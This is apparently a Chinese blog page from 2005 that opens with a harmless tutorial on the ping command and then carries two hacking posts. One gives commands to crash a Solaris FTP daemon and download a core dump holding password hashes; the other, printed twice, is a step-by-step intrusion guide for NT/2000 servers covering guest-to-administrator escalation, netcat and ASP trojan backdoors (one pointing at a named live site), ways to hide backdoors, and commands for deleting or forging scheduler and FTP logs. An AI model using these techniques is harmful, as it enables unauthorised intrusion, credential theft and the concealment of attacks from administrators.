Ping是潜水艇人员的专用术语,表示回应的声纳脉冲,在网络中Ping 是一个十分好用的TCP/IP工具。它主要的功能是用来检测网络的连通情况和分析网络速度。
Ping有好的善的一面也有恶的一面。先说一下善的一面吧。上面已经说过Ping的用途就是用来检测网络的连通情况和分析网络速度,但它是通过什么来显示连通呢?这首先要了解Ping的一些参数和返回信息。
以下是PING的一些参数:
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] | [-k computer-list] [-w timeout] destination-list
-t
Ping 指定的计算机直到中断。
-a
将地址解析为计算机名。
-n count
发送 count 指定的 ECHO 数据包数。默认值为 4。
-l length
发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是65,527。
-f
在数据包中发送"不要分段"标志。数据包就不会被路由上的网关分段。
-i ttl
将"生存时间"字段设置为 ttl 指定的值。
-v tos
将"服务类型"字段设置为 tos 指定的值。
-r count
在"记录路由"字段中记录传出和返回数据包的路由。count 可以指定最少 1 台,最多 9 台计算机。
-s count
指定 count 指定的跃点数的时间戳。
-j computer-list
利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。
-k computer-list
利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。
-w timeout
指定超时间隔,单位为毫秒。
destination-list
指定要 ping 的远程计算机。
Ping的返回信息有"Request Timed Out"、"Destination Net Unreachable"和"Bad IP address"还有"Source quench received"。
"Request Timed Out"这个信息表示对方主机可以到达到TIME OUT,这种情况通常是为对方拒绝接收你发给它的数据包造成数据包丢失。大多数的原因可能是对方装有防火墙或已下线。
"Destination Net Unreachable"这个信息表示对方主机不存在或者没有跟对方建立连接。这里要说明一下"destination host unreachable"和"time out"的区别,如果所经过的路由器的路由表中具有到达目标的路由,而目标因为其它原因不可到达,这时候会出现"time out",如果路由表中连到达目标的路由都没有,那就会出现"destination host unreachable"。
"Bad IP address" 这个信息表示你可能没有连接到DNS服务器所以无法解析这个IP地址,也可能是IP地址不存在。
"Source quench received"信息比较特殊,它出现的机率很少。它表示对方或中途的服务器繁忙无法回应。
怎样使用Ping这命令来测试网络连通呢?
连通问题是由许多原因引起的,如本地配置错误、远程主机协议失效等,当然还包括设备等造成的故障。
首先我们讲一下使用Ping命令的步骤。
使用Ping检查连通性有五个步骤:
1. 使用ipconfig /all观察本地网络设置是否正确;
2. Ping 127.0.0.1,127.0.0.1 回送地址Ping回送地址是为了检查本地的TCP/IP协议有没有设置好;
3. Ping本机IP地址,这样是为了检查本机的IP地址是否设置有误;
4. Ping本网网关或本网IP地址,这样的是为了检查硬件设备是否有问题,也可以检查本机与本地网络连接是否正常;(在非局域网中这一步骤可以忽略)
5. Ping远程IP地址,这主要是检查本网或本机与外部的连接是否正常。
在检查网络连通的过程中可能出现一些错误,这些错误总的来说分为两种最常见。
1. Request Timed Out
"request time out"这提示除了在《PING(一)》提到的对方可能装有防火墙或已关机以外,还有就是本机的IP不正确和网关设置错误。
①、IP不正确:
IP不正确主要是IP地址设置错误或IP地址冲突,这可以利用ipconfig /all这命令来检查。在WIN2000下IP冲突的情况很少发生,因为系统会自动检测在网络中是否有相同的IP地址并提醒你是否设置正确。在NT中不但会出现"request time out"这提示而且会出现"Hardware error"这提示信息比较特殊不要给它的提示所迷惑。
②、网关设置错误:这个错误可能会在第四个步骤出现。网关设置错误主要是网关地址设置不正确或网关没有帮你转发数据,还有就是可能远程网关失效。这里主要是在你Ping外部网络地址时出错。错误表现为无法Ping外部主机返回信息"Request timeout"。
2. Destination Host Unreachable
当你在开始PING网络计算机时如果网络设备出错它返回信息会提示"destination host unreachable"。如果局域网中使用DHCP分配IP时,而碰巧DHCP失效,这时使用 PING命令就会产生此错误。因为在DHCP失效时客户机无法分配到IP系统只有自设IP,它往往会设为不同子网的IP。所以会出现"Destination Host Unreachable"。另外子网掩码设置错误也会出现这错误。
还有一个比较特殊就是路由返回错误信息,它一般都会在"Destination Host Unreachable"前加上IP地址说明哪个路由不能到达目标主机。这说明你的机器与外部网络连接没有问题,但与某台主机连接存在问题。
举个例子吧。
我管理的网络有19台机,由一台100M集线器连接服务器,使用DHCP动态分配IP地址。
有一次有位同事匆忙地告诉我"我的OUTLOOK打不开了",我到他机器检查,首先我检查了本地网络设置,我用ipconfig /all看IP分配情况一切正常。接着我就开始PING网络中的其中一台机器,第一次PING结果很正常,但OUTLOOK还是无法使用其它网络软件和Copy网络文件都可以使用但网络速度很慢,第二次PING我用了一个参数-t(-t可以不中断地PING对方,当时我想PING一次可能发现不了问题)发现有time=30ms和request time out,从服务器PING这台机就更有趣,request time out比正常数据还多,在局域中竟然有time=30ms和request time out太不正常了。开始我认为是网卡的问题但换网卡后故障依旧,重做网线还是不能解决问题,这故障真有趣!最后我没办法了把它插在集线器端口上的另一端的网线换到另一个端口,哈!故障解决了。原来是集线器端口坏了。
如何用Ping命令来判断一条链路的速度?
Ping这个命令除了可以检查网络的连通和检测故障以外,还有一个比较有趣的用途,那就是可以利用它的一些返回数据,来估算你跟某台主机之间的速度是多少字节每秒
我们先来看看它有那些返回数据。
Pinging 202.105.136.105 with 32 bytes of data:
Reply from 202.105.136.105: bytes=32 time=590ms TTL=114
Reply from 202.105.136.105: bytes=32 time=590ms TTL=114
Reply from 202.105.136.105: bytes=32 time=590ms TTL=114
Reply from 202.105.136.105: bytes=32 time=601ms TTL=114
Ping statistics for 202.105.136.105:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 590ms, Maximum = 601ms, Average = 593ms
在例子中"bytes=32"表示ICMP报文中有32个字节的测试数据(这是估算速度的关键数据),"time=590ms"是往返时间。
怎样估算链路的速度呢?举个例子吧。我们把A和B之间设置为PPP链路。
从上面的PING例子可以注意到,默认情况下发送的ICMP报文有32个字节。除了这32个字节外再加上20个字节的IP首部和8个字节的ICMP首部,整个IP数据报文的总长度就是60个字节(因为IP和ICMP是Ping命令的主要使用协议,所以整个数据报文要加上它们)。另外在使用Ping命令时还使用了另一个协议进行传输,那就是PPP协议(点对点协议),所以在数据的开始和结尾再加上8个字节。在传输过程中,由于每个字节含有8bit数据、1bit起始位和1bit结束位,因此传输速率是每个字节2.98ms。由此我们可以估计需要405ms。即68*2.98*2(乘2是因为我们还要计算它的往返时间)。
我们来测试一下33600 b/s的链路:
Pinging 202.105.36.125 with 32 bytes of data:
Reply from 202.105.36.125: bytes=32 time=415ms TTL=114
Reply from 202.105.36.125: bytes=32 time=415ms TTL=114
Reply from 202.105.36.125: bytes=32 time=415ms TTL=114
Reply from 202.105.36.125: bytes=32 time=421ms TTL=114
Ping statistics for 202.105.36.125:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 415ms, Maximum = 421ms, Average = 417ms
看是不是差不多啊。'
这里大家可能要注意到,这估算值跟实际值是有误差的,为什么呢?因为我们现在估算的是一个理论值,还有一些东西我们没有考虑。比如在网络中的其它干扰,这些干扰主要来之别的计算机。因为在你测试时不可能全部计算机停止使用网络给你做测试,这是不实际的。另外就是传输设备,因为有某些设备如MODEM它在传输时会把数据压缩后再发送,这大大减少了传输时间。这些东西产生的误差我们是不能避免的,但其数值大约在5%以内我们都可以接受(利用MODEM传输例外),但是可以减少误差的产生。比如把MODEM的压缩功能关闭和在网络没有那么繁忙时进行测试。有时候误差是无须消除的。因为我们需要这些误差跟所求得的理论值进行比较分析,从而找出网络的缺陷而进行优化。这时测试网络的所有数据包括误差都会成为我们优化的依据。
还要注意,这种算法在局域网并不适用,因为在局域网中速度非常的快几乎少于1ms,而Ping的最小时间分辨率是1ms,所以根本无法用Ping命令来检测速度。如果想测试速度那就要用专门仪器来检测。
总的来说,Ping命令是一个在故障检查方面很有用而且很便利的工具,你不应该忽视它的存在。(全文完
Post by crazycat at 2005-05-21 14:05 |Comments (0)| 静态链接网址
用FTP获得密码 [黑客文章]
该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
1.通过 ftp 正常登录到目的主机上
2.输入如下命令序列:
ftp> user root wrongpasswd
ftp> quote pasv
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
4.再次进入FTP >get core
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
这是我知道的一个方法~
拿来丢人了啊~
Post by crazycat at 2005-05-21 13:59 |Comments (0)| 静态链接网址
介绍几个小工具和入侵的技法! [黑客文章]
如果你已经夺取了一定的权限,比如,可写的! 那么运用下面两个软件,可以轻易的帮你入侵: DNTUCli.exe DNTUS26.exe 在命令提示下运行: D:>DNTUCli.exe Usage: DNTUCli.exe DNTUCli.exe MachineName (remote server is MachineName) DNTUCli.exe . (local server) Copyright (C) 1991-2001 DameWare Development [url]www.dameware.com[/url] 当你输入ip的时候会让你输入用户和密码! 只要对方开了rpc而且你的用户有可写的权限的话!! 就会复制同一目录下的DNTUS26.exe,这种程序是自己安装而且自己打开服务的! 然后你就可以直接连接到对方的c了! 这种软件有CMD重定向功能··· 然后你就随便想做你的任何事情了! C:>net user FYNET33 的用户帐户 ---------------------------------- Administrator Guest 命令成功完成。 C:>net user guest /active:yes 命令成功完成。 C:>net user guest wry 命令成功完成。 C:>net user localgroup administratorsguest/add 命令成功完成。 这个时候你的guest已经是管理员了!!如果你禁止了net.exe或者被删除了你可以用 ftp命令下一个net.exe或者另外一个软件adduser.exe 用法: D:>addusers.exe ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [computername|domainname] [/p :{l|c|e|d}] Error: too few arguments 现在你就是管理员了!要是感觉还不是很爽!呵呵!那么努力进它的内部网络吧!! 看: 一,进入第一台假设平台的nt服务器 通过简单的扫描器,只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。 通常的用户名不是空就是相同。 绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表 及采用暴力法不断验证他们的密码 。 然后,就是因为网管在意识上的不重视,攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的 或密码为空的服务器。 二,攻击者控制服务器文件系统 有了密码对入侵者来说,绝对不是他们的最终目的! 隐射为本地盘,当入侵者得到你adminitrator组的任何一个成员的密码,或者是个普通用户的密码 这里我把具体命令cut了! 1,是administrator的成员时几乎可以隐射你任意一个盘。 2,普通用户将利用各种可能的机会得到更多的信息或直接利用web hole来获取更大的权限。 典型的手法有:利用web asp的功能!控制你整个硬盘 (注意iis的一些已知的漏洞 upload.asp)。 注意:利用asp 功能,攻击者同样能控制你硬盘上的大多数的文件(everyone的文件) 三,起动任何他们想要立即运行的程序 一般来说立即启动对nt来说是比较困难的,虽然有些入侵者会写几句命令,然后等待服务器重新 启动时,他的程序也将得以运行,但是我想对于大多数的攻击者来说,他们不会有那么好的耐心 他们会立即启动他们的东西(可能是些后门木马)。 在nt iis的web配置里有个选项是执行--------危险 攻击者将利用他控制你文件系统的任何一种方法把他要启动的程序放到那些允许执行的目录里去 然后他们将 [url]http://www.xxx.com/cgi-bin/xxx.exe[/url] 利用web 启动该文件。 指出:iis 默认的一些目录带有可执行的权利 /script/tools/ .... 对于一些初级入侵者来说,他们往往启动的是些后门木马,然后对于那些经验丰富的入侵者 他可能对控制你一台机器已经显得毫无兴趣,他们可能真正的目的是控制你的整个网段。 这里值得注意的是,这些入侵者将会启动一个 等同于telnet shell for nt的东西 netcat ncx99.exe将在nt的99段口开启一个telnet服务端进程,等代攻击者的登陆 四,登陆取得最高权限 登陆后的入侵者在远端服务器并不具有最高的权限,他们将采用一些nt本地溢出变成admin 其中著名的程序是getadmin.exe 五,删除日志记录 任何一个入侵者都懂得保护他们自己!所以删除日志记录对他们来说是件很重要的事在这里 我建议网管采用第二硬备份或采用第三方日志记录系统。 由于nt的日志文件是当前进程运行操作的文件,他是根据时间来不断换新的操作文件的 任何人包括admin在内是无权删除或更改的。 而这里有个简单的不能在简单的原理,入侵者在取得admin权限后通过更改系统时间!让日志 记录进程转而记录另一个文件,然后更改他想更改的那个日志文件。 六,进入你的内部网 由于攻击者登陆你的 shell ,此时的他所具有的ip 等同于你这台机器上的内部地址 ftp 198.162.1.2 telnet 127.0.0.3 net view net use * 都将在他们的手里变成入侵你内部网的工具,通过影射,然后在 cd z: 同时上述的攻击手段将再一次在内部网重演,扫描,破解,登陆。内部网络的速度将比远程 快很多,这无意给入侵者暴力破解打开了方便之门。 七,更多手段 可能话!他们会做一切你想不到的事!监听,ip欺骗。。。。。 但是,嗅探的方法是不可能在交换机的网络里抓到信息的!即使在内部网络里,我们的 目标就是拿到对方的密码才可以有访问的权限! 如果你侥幸的有权限加到了域管理员!那么以上的都不要了! 我在把2000和nt下的后门拿出来说一下子: 如何做个好后门是很关键的; 1》推荐为小榕的RemoteNC,RemoteNC Beta 4 远程安装于NT/2000,提供CMD重定向功能 因为它具有cmd的重定向,也就是调用了对方的cmd,所以可以穿过放火墙后面的主机,传递信息但是必须要是administrator的身份安装 唯一的不好的,现在这个软件已经被列入了病毒的行列了!我压缩了后,又被最新的kv3000杀死了! 2》现在推荐为蓝色火焰,目前还没有被查杀了,支持ftp,telnet 等多种方式!既然你已经获得了管理员权限了! 那么复制到对方的admin4system32改一个隐蔽的名字!! 然后用at命令或者直接用RemoteNC启动!,这个软件后门唯一不好处没有和exe关联! 很容易被删除的! 3》推荐为asp木马。这种木马永远不会被查杀!上传到对方主机有可执行的asp的目录下! 直接可以在浏览器上直接运行的! 比如: [url]http://www.fibrlink.com/flink/apply/cmdasp.asp[/url] 这个站点,我做的asp木马,到我写的时候,还是可以用的!希望大家只是用来测试! 4》推荐为tini.exe这个后门软件,据说是永远不会被查杀的软件,因为它用的是window的shell通道!!呵呵!但是,我在测试的时候还是会被最新的锘盾杀死的! 复制到对方主机上,运行后 就可以telnet对方的7777断口了! 如何把自己的后门程序隐藏的比较好? 1。取比较和系统文件的名字,比如:asp.exe管理员在删除的时候就的考虑了! 2。用attrib隐藏文件了。但是这样只是表面的隐藏! 3。运用一些活门的程序,比如:Explorer.exe 一般的这个程序都是在键值shell下的! 每次都会运行的!那么每次你的后门程序都会启动! 4。隐藏在数据流里!(稍后介绍) 后门做好了,不要万事大吉了!还要删除了自己的记录! Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、smtp服务器日志,DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同而有所不同。还有一些网络管理软件的日志,说到这里,记得新浪的网管软件是自己开发的,如果不了解这个,可能会留下更多的记录!!! 1) Scheduler日志 Scheduler服务日志默认位置:2000下: %sys temroot%schedlgu.txt NTworkstation下为 SchedLog.txt 可以打开schedlgu.txt Schedluler服务日志在注册表中 HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent 先停掉他 net stop "task scheduler" (注意不停是删不掉的) 然后再 del schedlgu.txt 或 schedlog.txt之后就OK了. del sched*.txt 不过你如果不想删他,也可以改改它. 他的内容是这样的: " "任务计划程序服务" 已退出于 01-5-22 20:37:34 "任务计划程序服务" 已启动于 01-5-25 7:07:37 "任务计划程序服务" 已启动于 01-5-25 7:26:36 "任务计划程序服务" 已退出于 01-5-25 8:47:54 " 很好改的. (2) FTP日志 Internet信息服务FTP日志默认位置:%sys temroot%sys tem32logfilesmsftpsvc1,默认每天一个日志. 格式是这样的 ex*.log . 注意这是一台NT4的LOGFILES下的文件: 这台服务器下管理有多个HTTP或FTP站点 c:winntsys tem32logfiles 的目录 00-12-04 06:28p . 00-12-04 06:28p .. 01-05-18 12:56p MSFTPSVC1 01-04-23 11:28a MSFTPSVC2 01-01-12 11:56a MSFTPSVC3 01-06-01 08:12a SMTPSVC1 01-09-20 08:55a W3SVC1 01-08-02 10:36a W3SVC10 01-10-11 04:48p W3SVC11 01-07-11 09:16a W3SVC2 01-10-11 10:31a W3SVC3 01-10-10 04:55p W3SVC4 01-09-28 01:43p W3SVC5 01-10-11 08:44a W3SVC6 01-10-11 08:00a W3SVC7 01-09-30 01:49p W3SVC8 01-10-11 08:03a W3SVC9 看看日志文件的格式: c:winntsys tem32logfilesmsftpsvc1in010306.log 192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 331, 0, [3]USER, anonymous, -, 192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53 0, 1326, [3]PASS, IE30User@, -, 法一:> 这个时侯 net stop msftpsvc 停掉后台服务. 然后尽管 del ............ 看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开. 法二:> 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦 实际上在得到ADMIN权限后,做这些事很容易. 法三 最傻瓜的清FTP日志的方法, cleaniislog !! 以上,难免有错误之处,因为俺也是个很菜的鸟,请高手赐教!有的地方,我懒的写就直接拿过来了!希望作者谅解!文章也很散乱,主要俺也是个很懒的人。只求菜鸟们能理解 !
如果你已经夺取了一定的权限,比如,可写的!
那么运用下面两个软件,可以轻易的帮你入侵:
DNTUCli.exe
DNTUS26.exe
在命令提示下运行:
D:>DNTUCli.exe
Usage: DNTUCli.exe server>
DNTUCli.exe MachineName (remote server is MachineName)
DNTUCli.exe . (local server)
Copyright (C) 1991-2001 DameWare Development
[url]www.dameware.com[/url]
当你输入ip的时候会让你输入用户和密码!
只要对方开了rpc而且你的用户有可写的权限的话!!
就会复制同一目录下的DNTUS26.exe,这种程序是自己安装而且自己打开服务的!
然后你就可以直接连接到对方的c了!
这种软件有CMD重定向功能···
然后你就随便想做你的任何事情了!
C:>net user
FYNET33 的用户帐户
----------------------------------
Administrator Guest
命令成功完成。
C:>net user guest /active:yes
命令成功完成。
C:>net user guest wry
命令成功完成。
C:>net user localgroup administratorsguest/add
命令成功完成。
这个时候你的guest已经是管理员了!!如果你禁止了net.exe或者被删除了你可以用
ftp命令下一个net.exe或者另外一个软件adduser.exe
用法:
D:>addusers.exe
ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [computername|domainname] [/p
:{l|c|e|d}]
Error: too few arguments
现在你就是管理员了!要是感觉还不是很爽!呵呵!那么努力进它的内部网络吧!!
看:
一,进入第一台假设平台的nt服务器
通过简单的扫描器,只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。
通常的用户名不是空就是相同。
绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表
及采用暴力法不断验证他们的密码 。
然后,就是因为网管在意识上的不重视,攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的
或密码为空的服务器。
二,攻击者控制服务器文件系统
有了密码对入侵者来说,绝对不是他们的最终目的!
隐射为本地盘,当入侵者得到你adminitrator组的任何一个成员的密码,或者是个普通用户的密码
这里我把具体命令cut了!
1,是administrator的成员时几乎可以隐射你任意一个盘。
2,普通用户将利用各种可能的机会得到更多的信息或直接利用web hole来获取更大的权限。
典型的手法有:利用web asp的功能!控制你整个硬盘 (注意iis的一些已知的漏洞 upload.asp)。
注意:利用asp 功能,攻击者同样能控制你硬盘上的大多数的文件(everyone的文件)
三,起动任何他们想要立即运行的程序
一般来说立即启动对nt来说是比较困难的,虽然有些入侵者会写几句命令,然后等待服务器重新
启动时,他的程序也将得以运行,但是我想对于大多数的攻击者来说,他们不会有那么好的耐心
他们会立即启动他们的东西(可能是些后门木马)。
在nt iis的web配置里有个选项是执行--------危险
攻击者将利用他控制你文件系统的任何一种方法把他要启动的程序放到那些允许执行的目录里去
然后他们将 [url]http://www.xxx.com/cgi-bin/xxx.exe[/url] 利用web 启动该文件。
指出:iis 默认的一些目录带有可执行的权利 /script/tools/ ....
对于一些初级入侵者来说,他们往往启动的是些后门木马,然后对于那些经验丰富的入侵者
他可能对控制你一台机器已经显得毫无兴趣,他们可能真正的目的是控制你的整个网段。
这里值得注意的是,这些入侵者将会启动一个 等同于telnet shell for nt的东西
netcat ncx99.exe将在nt的99段口开启一个telnet服务端进程,等代攻击者的登陆
四,登陆取得最高权限
登陆后的入侵者在远端服务器并不具有最高的权限,他们将采用一些nt本地溢出变成admin
其中著名的程序是getadmin.exe
五,删除日志记录
任何一个入侵者都懂得保护他们自己!所以删除日志记录对他们来说是件很重要的事在这里
我建议网管采用第二硬备份或采用第三方日志记录系统。
由于nt的日志文件是当前进程运行操作的文件,他是根据时间来不断换新的操作文件的
任何人包括admin在内是无权删除或更改的。
而这里有个简单的不能在简单的原理,入侵者在取得admin权限后通过更改系统时间!让日志
记录进程转而记录另一个文件,然后更改他想更改的那个日志文件。
六,进入你的内部网
由于攻击者登陆你的 shell ,此时的他所具有的ip 等同于你这台机器上的内部地址
ftp 198.162.1.2
telnet 127.0.0.3
net view
net use *
都将在他们的手里变成入侵你内部网的工具,通过影射,然后在 cd z:
同时上述的攻击手段将再一次在内部网重演,扫描,破解,登陆。内部网络的速度将比远程
快很多,这无意给入侵者暴力破解打开了方便之门。
七,更多手段
可能话!他们会做一切你想不到的事!监听,ip欺骗。。。。。
但是,嗅探的方法是不可能在交换机的网络里抓到信息的!即使在内部网络里,我们的
目标就是拿到对方的密码才可以有访问的权限!
如果你侥幸的有权限加到了域管理员!那么以上的都不要了!
我在把2000和nt下的后门拿出来说一下子:
如何做个好后门是很关键的;
1》推荐为小榕的RemoteNC,RemoteNC Beta 4 远程安装于NT/2000,提供CMD重定向功能
因为它具有cmd的重定向,也就是调用了对方的cmd,所以可以穿过放火墙后面的主机,传递信息但是必须要是administrator的身份安装
唯一的不好的,现在这个软件已经被列入了病毒的行列了!我压缩了后,又被最新的kv3000杀死了!
2》现在推荐为蓝色火焰,目前还没有被查杀了,支持ftp,telnet 等多种方式!既然你已经获得了管理员权限了!
那么复制到对方的admin4system32改一个隐蔽的名字!!
然后用at命令或者直接用RemoteNC启动!,这个软件后门唯一不好处没有和exe关联!
很容易被删除的!
3》推荐为asp木马。这种木马永远不会被查杀!上传到对方主机有可执行的asp的目录下!
直接可以在浏览器上直接运行的!
比如:
[url]http://www.fibrlink.com/flink/apply/cmdasp.asp[/url]
这个站点,我做的asp木马,到我写的时候,还是可以用的!希望大家只是用来测试!
4》推荐为tini.exe这个后门软件,据说是永远不会被查杀的软件,因为它用的是window的shell通道!!呵呵!但是,我在测试的时候还是会被最新的锘盾杀死的!
复制到对方主机上,运行后
就可以telnet对方的7777断口了!
如何把自己的后门程序隐藏的比较好?
1。取比较和系统文件的名字,比如:asp.exe管理员在删除的时候就的考虑了!
2。用attrib隐藏文件了。但是这样只是表面的隐藏!
3。运用一些活门的程序,比如:Explorer.exe 一般的这个程序都是在键值shell下的!
每次都会运行的!那么每次你的后门程序都会启动!
4。隐藏在数据流里!(稍后介绍)
后门做好了,不要万事大吉了!还要删除了自己的记录!
Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、smtp服务器日志,DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同而有所不同。还有一些网络管理软件的日志,说到这里,记得新浪的网管软件是自己开发的,如果不了解这个,可能会留下更多的记录!!!
1) Scheduler日志
Scheduler服务日志默认位置:2000下: %sys temroot%schedlgu.txt NTworkstation下为 SchedLog.txt
可以打开schedlgu.txt
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent
先停掉他 net stop "task scheduler" (注意不停是删不掉的)
然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.
del sched*.txt
不过你如果不想删他,也可以改改它. 他的内容是这样的:
" "任务计划程序服务"
已退出于 01-5-22 20:37:34
"任务计划程序服务"
已启动于 01-5-25 7:07:37
"任务计划程序服务"
已启动于 01-5-25 7:26:36
"任务计划程序服务"
已退出于 01-5-25 8:47:54 "
很好改的.
(2) FTP日志
Internet信息服务FTP日志默认位置:%sys temroot%sys tem32logfilesmsftpsvc1,默认每天一个日志.
格式是这样的 ex*.log .
注意这是一台NT4的LOGFILES下的文件:
这台服务器下管理有多个HTTP或FTP站点
c:winntsys tem32logfiles 的目录
00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a SMTPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9
看看日志文件的格式:
c:winntsys tem32logfilesmsftpsvc1in010306.log
192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,
0, 0, 331, 0, [3]USER, anonymous, -,
192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53
0, 1326, [3]PASS, IE30User@, -,
法一:> 这个时侯 net stop msftpsvc 停掉后台服务.
然后尽管 del ............
看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.
法二:> 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦
实际上在得到ADMIN权限后,做这些事很容易.
法三 最傻瓜的清FTP日志的方法, cleaniislog !!
扫一扫
1832
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
